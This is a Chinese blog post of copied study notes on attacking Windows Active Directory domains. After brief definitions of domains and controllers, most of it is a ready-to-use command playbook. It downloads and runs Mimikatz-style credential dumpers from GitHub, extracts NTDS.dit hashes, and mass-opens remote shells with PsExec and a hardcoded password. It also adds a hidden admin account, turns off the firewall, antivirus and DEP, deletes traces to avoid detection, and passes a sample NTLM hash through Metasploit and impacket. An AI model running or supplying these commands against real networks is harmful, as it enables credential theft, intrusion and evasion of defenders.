
<!DOCTYPE html>
<html lang="zh" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>域渗透 - oxcccccc</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="ccreater,"> 
    <meta name="description" content="域渗透学习笔记名词/缩写 活动目录（Active Directory），AD：活动目录是WindowsServer在网络环境中提供的“资源目录”。活动目录是储存着域中相关资源信息的目录，例如计算机，,"> 
    <meta name="author" content="ccreater"> 
    <link rel="alternative" href="atom.xml" title="oxcccccc" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

<meta name="generator" content="Hexo 4.1.1"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">oxcccccc</span>
    <div id="loader"></div>
    
<div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://explorersss.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">域渗透</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg);">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/渗透"><b>「
                    </b>渗透<b> 」</b></a>
                
                February 17, 2020
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2020/02/17/%E5%9F%9F%E6%B8%97%E9%80%8F/" title="域渗透" class="">域渗透</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    9k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    8 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">域渗透</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <h1 id="域渗透学习笔记"><a href="#域渗透学习笔记" class="headerlink" title="域渗透学习笔记"></a>域渗透学习笔记</h1><h2 id="名词-缩写"><a href="#名词-缩写" class="headerlink" title="名词/缩写"></a>名词/缩写</h2><p> 活动目录（Active Directory），AD：活动目录是WindowsServer在网络环境中提供的“资源目录”。活动目录是储存着域中相关资源信息的目录，例如计算机，用户组，数据库，服务器，打印机，用户属性（权限等），就像一个数据库。<br>域控（Domain Controller），DC：安装了AD的服务器就是域控制器，即有AD的计算机就是DC。 </p>
<h2 id="什么是域"><a href="#什么是域" class="headerlink" title="什么是域"></a>什么是域</h2><p> 将网络中多台计算机逻辑上组织到一起，进行集中管理，这种区别于工作组的逻辑环境叫做域，域是组织与存储资源的核心管理单元，在域中，至少有一台域控制器，域控制器中保存着整个域的用户帐号和安全数据库。 </p>
<h2 id="域的特点"><a href="#域的特点" class="headerlink" title="域的特点"></a>域的特点</h2><p> 域成员计算机在登录的时候可以选择登录到域中或此计算机，登陆到域中的时候，身份验证是采用Kerberos协议在域控制器上进行的，登陆到此计算机则是通过SAM来进行NTLM验证的</p>
<p> 默认情况下，域用户可以登录到域中所有的工作站，不包括域控制器，管理员也可以指定具体的计算机，域用户信息保存在活动目录中</p>
<h2 id="一些其他关于域的知识"><a href="#一些其他关于域的知识" class="headerlink" title="一些其他关于域的知识"></a>一些其他关于域的知识</h2><h3 id="DNS定位域控制器"><a href="#DNS定位域控制器" class="headerlink" title="DNS定位域控制器"></a>DNS定位域控制器</h3><p>DNS负责将域名解析成IP地址</p>
<p>内网的DNS则可以定位DC，域会有名称，比如domaintest。域会向DNS注册这个名称，即SRV记录。域中的计算机访问SRV来进而访问DC。</p>
<p>通常DNS和DC会安装在同一计算机上，因而此计算的本地连接DNS要指向自身。</p>
<h2 id="域渗透思路"><a href="#域渗透思路" class="headerlink" title="域渗透思路"></a>域渗透思路</h2><p> 通过域成员主机，定位出域控制器IP及域管理员账号，利用域成员主机作为跳板，扩大渗透范围，利用域管理员可以登陆域中任何成员主机的特性，定位出域管理员登陆过的主机IP，设法从<strong>域成员主机内存中</strong>dump出域管理员密码，进而拿下域控制器、渗透整个内网。 </p>
<h2 id="域渗透常用命令"><a href="#域渗透常用命令" class="headerlink" title="域渗透常用命令"></a>域渗透常用命令</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><pre><code>dsquery server #得到域控制器的IP</code></pre><p><img src="http://www.xmrseo.com/content/uploadfile/201805/dad51527168524.jpg" alt="image886"></p>
<p><code>net group &quot;domain controllers&quot; /domain</code>: 得到域控制器主机名 </p>
<p> 注意通过该指令得到的机器名后面会多一个$符号</p>
<p><code>net group &quot;domain admins&quot; /domain</code>  : 查询域管理用户 </p>
<p><code>net user /domain</code>查看所有域用户</p>
<p><code>net config workstation</code> : 查询当前登陆域 </p>
<p><code>net accounts /domain</code>:  查询域密码策略 </p>
<p><code>wmic qfe</code> : 查看补丁信息 </p>
<p><code>wmic os</code>:  查看操作系统类型 </p>
<p><code>ipconfig /all</code>查询本机IP段，所在域等</p>
<p><code>tasklist /S ip /U domain\username /P /V</code>查看远程计算机进程列表</p>
<p> 有一个特殊用户叫做krbtgt，该用户是用于Kerberos身份验证的帐户，获得了该用户的hash，就可以伪造票据进行票据传递攻击了 </p>
<h4 id="批量查找-域管理员登陆过目标计算机"><a href="#批量查找-域管理员登陆过目标计算机" class="headerlink" title="批量查找 域管理员登陆过目标计算机"></a>批量查找 域管理员登陆过目标计算机</h4><pre><code class="bat">@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! &amp; goto end
echo read and analysis file...
for /F &quot;eol=#&quot; %%i in (ip.txt) do echo %%i &amp;(echo %%i &amp;tasklist /s %%i /u administrator /p mytest2010 /v) &gt;&gt;d:\result.txt
:end
exit</code></pre>
<h4 id="批量反弹cmdshell"><a href="#批量反弹cmdshell" class="headerlink" title="批量反弹cmdshell"></a>批量反弹cmdshell</h4><pre><code class="cmd">@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! &amp; goto end
echo read and analysis file...
for /F &quot;eol=#&quot; %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p &quot;123456&quot; cmd &amp; start cmd /c PsExec.exe \\%%i -u administrator -p &quot;123456&quot; cmd
:end
exit</code></pre>
<h3 id="访问内网其他主机"><a href="#访问内网其他主机" class="headerlink" title="访问内网其他主机"></a>访问内网其他主机</h3><p> net use建立Ipc$连接、wmic指令连接、采用rdp方式连接 , psexec进行远程连接 </p>
<p><img src="http://www.xmrseo.com/content/uploadfile/201805/dad51527169390.jpg" alt="image2183"></p>
<p><code>net use \\ip\ipc$ pawword /user:username</code>建立IPC会话</p>
<h3 id="抓取内存中的hash-密码"><a href="#抓取内存中的hash-密码" class="headerlink" title="抓取内存中的hash/密码"></a>抓取内存中的hash/密码</h3><p>抓明文</p>
<pre><code>powershell IEX (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&#39;); Invoke-Mimikatz -DumpCerts</code></pre><h4 id="普通hash"><a href="#普通hash" class="headerlink" title="普通hash"></a>普通hash</h4><p>抓hash</p>
<pre><code>powershell IEX (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1&#39;);Get-PassHashes</code></pre><p>抓取明文:<code>mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords full&quot; exit</code></p>
<p>抓取hash:<code>mimikatz log &quot;privilege::debug&quot; &quot;lsadump::lsa /patch&quot; exit</code></p>
<p><code>mimikatz.exe &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:god.org /all /csv&quot; exit</code></p>
<h4 id="域hash"><a href="#域hash" class="headerlink" title="域hash"></a>域hash</h4><p>NTDS.dit获取域控hash</p>
<p>这个思路在域渗透中尤为重要，因为这里面包含着所有域用户的hash，当然该思路只对DC生效。</p>
<p>手动导出NTDS.dit和System-hive，本地或目标机导hash，因为，如果域足够大，该文件也会特别大。</p>
<p><code>ntdsutil &quot;ac i ntds&quot; ifm &quot;create full c:\users\tmp&quot; q q</code></p>
<p><code>NTDSDumpEx -d ntds.dit -s system -o domain.txt</code>:注意-d 为ntds.dit路径,-s为system(导出的)路径</p>
<p><img src="https://image.3001.net/images/20191022/1571757314_5daf1d0242611.png!small" alt="image3247"></p>
<pre><code>python secretsdump.py -system SYSTEM -ntds ntds.dit local
python secretsdump.py rabbitmask:1q2w3e4r!@192.168.15.181
</code></pre><p><img src="https://image.3001.net/images/20191022/1571757406_5daf1d5ee8ee7.png!small" alt="image3460"></p>
<p><img src="https://image.3001.net/images/20191022/1571757426_5daf1d72d86f0.png!small" alt="image3545"></p>
<h3 id="添加用户"><a href="#添加用户" class="headerlink" title="添加用户"></a>添加用户</h3><pre><code>net user ccreater Abc1234 /add
net localgroup administrators ccreater /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
</code></pre><h3 id="域控提取域用户hash"><a href="#域控提取域用户hash" class="headerlink" title="域控提取域用户hash"></a>域控提取域用户hash</h3><h4 id="Ntdsutil"><a href="#Ntdsutil" class="headerlink" title="Ntdsutil"></a>Ntdsutil</h4><p> ntdsutil.exe是域控制器自带的域数据库管理工具，从windows 2008就默认自带了 </p>
<pre><code>Ntdsutil 
    snapshot—activate instance ntds
    create
    mount {guid}
copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit</code></pre><p><img src="http://www.xmrseo.com/content/uploadfile/201805/dad51527169954.jpg" alt="image4044"></p>
<p><img src="http://www.xmrseo.com/content/uploadfile/201805/dad51527170055.jpg" alt="image4122"></p>
<p> 最后执行 </p>
<pre><code>unmount {guid}
delete {guid}
quit</code></pre><p> 删除装载点即可，避免被发现 </p>
<p>接着上传工具QuarksPwDump到域控制器上，然后执行如下命令，成功提取用户hash</p>
<p><code>QuarksPwDump --dump-hash-domain --ntds-file d:\ntds_save.dit</code></p>
<h4 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h4><p><code>mimikatz log &quot;privilege::debug&quot; &quot;lsadump::lsa /patch&quot;</code></p>
<h3 id="关闭防火墙"><a href="#关闭防火墙" class="headerlink" title="关闭防火墙"></a>关闭防火墙</h3><pre><code>netsh advfirewall set allprofiles state off#关闭防火墙
net stop windefend
netsh firewall set opmode mode=disable
bcdedit.exe /set{current} nx AlwaysOff#关闭DEP
meterpreter &gt; run killav  关闭杀毒软件 </code></pre><h2 id="票据传递攻击"><a href="#票据传递攻击" class="headerlink" title="票据传递攻击"></a>票据传递攻击</h2><p> 域中每个用户的Ticket都是由krbtgt的密码Hash来计算生成的，因此只要我们拿到了krbtgt的密码Hash，就可以随意伪造Ticket，进而使用Ticket登陆域控制器，使用krbtgt用户hash生成的票据被称为Golden Ticket，此类攻击方法被称为票据传递攻击。 </p>
<h2 id="MS14-068-pth"><a href="#MS14-068-pth" class="headerlink" title="MS14-068/pth"></a>MS14-068/pth</h2><p> 微软给出的补丁是kb3011780，在server 2000以上的域控中，如果没有打这个补丁，那么情况将比较糟糕，利用该漏洞可以将任何一个域用户提权至域管理员权限，危害极大。 </p>
<h3 id="msf-psexec"><a href="#msf-psexec" class="headerlink" title="msf-psexec"></a>msf-psexec</h3><p>目标:192.168.52.138</p>
<pre><code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:a45a7246dd74b64a67f22fd7020f1bd8:::</code></pre><pre><code>use exploit/windows/smb/psexec
set lhost xxx
set lport xxx
set rhosts 192.168.52.138
set smbuser Administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:a45a7246dd74b64a67f22fd7020f1bd8</code></pre><h3 id="impacket-smbexec"><a href="#impacket-smbexec" class="headerlink" title="impacket_smbexec"></a>impacket_smbexec</h3><pre><code>python smbexec.py -hash aad3b435b51404eeaad3b435b51404ee:a45a7246dd74b64a67f22fd7020f1bd8Administrator@192.168.52.138

or

python smbexec.py -hashes :a45a7246dd74b64a67f22fd7020f1bd8 Administrator@192.168.52.138
</code></pre><p>显然，其实它只需要NThash部分就好啦。</p>
<h2 id="copy-于"><a href="#copy-于" class="headerlink" title="copy 于"></a>copy 于</h2><p> <a href="http://www.xmrseo.com/?post=87" target="_blank" rel="noopener">http://www.xmrseo.com/?post=87</a> </p>
<p> <a href="https://zhengbao.wang/域渗透基础/" target="_blank" rel="noopener">https://zhengbao.wang/%E5%9F%9F%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80/</a> </p>
<p> <a href="https://www.freebuf.com/articles/system/217681.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/217681.html</a> </p>
<p><strong>本文作者</strong>：ccreater<br/><strong>本文地址</strong>： <a href="https://explorersss.github.io/2020/02/17/域渗透/">https://explorersss.github.io/2020/02/17/域渗透/</a> <br/><strong>版权声明</strong>：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='3fd4b7c51e3cfe6d1f43'
        data-cs='e3b1162bfd0bc86431672a764a8c801b4dc97929'
        data-r='Explorersss.github.io'
        data-o='Explorersss'
        data-a='Explorersss'
        data-d=''
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>ccreater</p>
                    <span>不忘初心,方得始终</span>
                    <dl>
                        <dd><a href="https://github.com/Explorersss" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://twitter.com/explore" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://stackoverflow.com/users/11778815/ccreater" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">33 <p>Articles</p></a></li>
                    <li><a href="/categories">9 <p>Categories</p></a></li>
                    <li><a href="/tags">19 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#域渗透学习笔记"><span class="toc-number">1.</span> <span class="toc-text">域渗透学习笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#名词-缩写"><span class="toc-number">1.1.</span> <span class="toc-text">名词&#x2F;缩写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#什么是域"><span class="toc-number">1.2.</span> <span class="toc-text">什么是域</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域的特点"><span class="toc-number">1.3.</span> <span class="toc-text">域的特点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#一些其他关于域的知识"><span class="toc-number">1.4.</span> <span class="toc-text">一些其他关于域的知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS定位域控制器"><span class="toc-number">1.4.1.</span> <span class="toc-text">DNS定位域控制器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域渗透思路"><span class="toc-number">1.5.</span> <span class="toc-text">域渗透思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#域渗透常用命令"><span class="toc-number">1.6.</span> <span class="toc-text">域渗透常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#信息收集"><span class="toc-number">1.6.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#访问内网其他主机"><span class="toc-number">1.6.2.</span> <span class="toc-text">访问内网其他主机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#抓取内存中的hash-密码"><span class="toc-number">1.6.3.</span> <span class="toc-text">抓取内存中的hash&#x2F;密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#添加用户"><span class="toc-number">1.6.4.</span> <span class="toc-text">添加用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#域控提取域用户hash"><span class="toc-number">1.6.5.</span> <span class="toc-text">域控提取域用户hash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#关闭防火墙"><span class="toc-number">1.6.6.</span> <span class="toc-text">关闭防火墙</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#票据传递攻击"><span class="toc-number">1.7.</span> <span class="toc-text">票据传递攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MS14-068-pth"><span class="toc-number">1.8.</span> <span class="toc-text">MS14-068&#x2F;pth</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#msf-psexec"><span class="toc-number">1.8.1.</span> <span class="toc-text">msf-psexec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#impacket-smbexec"><span class="toc-number">1.8.2.</span> <span class="toc-text">impacket_smbexec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#copy-于"><span class="toc-number">1.9.</span> <span class="toc-text">copy 于</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":100},"mobile":{"show":true},"react":{"opacity":0.7},"dialog":{"enable":true,"hitokoto":true},"log":false});</script></body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2020
        <span class="gradient-text">
            ccreater
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.3" target="_blank" rel="noopener">v1.4.3</a></small>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    
<link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">

    
<script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>


<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>


<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>


<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>




    
<script src="/js/busuanzi.min.js"></script>

    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>



<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["不忘初心,方得始终", "Think like an artist, develop like an artisan"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>



<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/click.js"></script>
<script type="text/javascript" src="/js/click-word.js"></script>
<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/fireworks.js"></script>
</html>
